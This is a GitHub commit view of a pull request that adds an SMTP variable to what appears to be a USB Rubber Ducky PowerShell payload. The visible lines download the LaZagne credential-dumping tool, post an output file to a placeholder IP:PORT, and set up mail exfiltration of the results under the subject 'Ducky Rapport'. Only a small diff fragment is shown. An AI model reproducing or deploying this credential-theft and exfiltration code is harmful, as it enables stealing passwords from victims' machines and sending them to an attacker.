Merge pull request #157 from m4ki3lf0/patch-3

Add $smtp variables
pull/160/head
hak5glytch 2022-10-10 19:45:58 -06:00 committed by GitHub
commit 6509c6a49e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 0 deletions

View File

@ -98,6 +98,7 @@ Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download
#Invoke-WebRequest -Uri "http://IP:PORT0" -Method POST -Body Get-Content "$dir\output.txt"
#Mail Exfiltration
$smtp = "" # Put SMTP SERVER HERE, TESTED WITH GOOGLES
$From = "" # Put the SENDER HERE
$To = "" # Put the RECEIVER HERE
$Subject = "Ducky Rapport"